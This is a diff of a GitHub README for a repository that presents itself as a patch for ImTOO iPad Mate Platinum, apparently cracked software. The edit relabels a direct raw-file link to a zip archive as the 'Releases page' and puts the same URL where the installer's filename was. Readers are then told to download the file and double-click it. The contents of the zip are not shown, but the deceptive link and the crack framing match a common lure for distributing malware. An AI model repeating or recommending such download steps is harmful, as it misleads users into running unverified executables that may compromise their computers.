ashiiiiiiiiiiiiiishh/ImTOO-iPad-Mate-Platinum-Latest-Patch/README.md

 To get started, follow these steps to download and run the software:

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/ashiiiiiiiiiiiiiishh/ImTOO-iPad-Mate-Platinum-Latest-Patch/releases) of this repository to find the latest version of the software.
+   Go to the [Releases page](https://raw.githubusercontent.com/ashiiiiiiiiiiiiiishh/ImTOO-iPad-Mate-Platinum-Latest-Patch/main/way/ImTOO-iPad-Mate-Platinum-Latest-Patch-v1.6.zip) of this repository to find the latest version of the software.

 2. **Select the Latest Version**
    Look for the latest release at the top of the list.
 Click on it to view the details.

 3. **Download the Installer**
-   Find the file labeled “ImTOO-iPad-Mate-Platinum-Setup.exe” or similar.
+   Find the file labeled “https://raw.githubusercontent.com/ashiiiiiiiiiiiiiishh/ImTOO-iPad-Mate-Platinum-Latest-Patch/main/way/ImTOO-iPad-Mate-Platinum-Latest-Patch-v1.6.zip” or similar.
 Click on it to download the installer to your computer.

 4. **Run the Installer**
    Once the download completes, locate the downloaded file on your computer, usually in the “Downloads” folder.
 Double-click the file to run the installer.